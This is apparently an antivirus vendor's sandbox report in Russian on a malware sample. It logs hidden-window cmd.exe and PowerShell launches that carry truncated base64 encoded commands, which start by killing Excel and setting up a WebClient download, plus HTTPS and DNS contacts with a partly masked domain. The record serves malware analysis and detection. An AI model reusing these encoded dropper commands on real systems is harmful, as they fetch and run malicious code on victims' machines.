Техническая информация
- '<SYSTEM32>\cmd.exe' /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQB...
- 'us###r###rs.com':443
- 'us###r###rs.com':443
- DNS ASK us###r###rs.com
- '<SYSTEM32>\cmd.exe' /K CD C: & PowerShell -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand dAByAHkAewBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...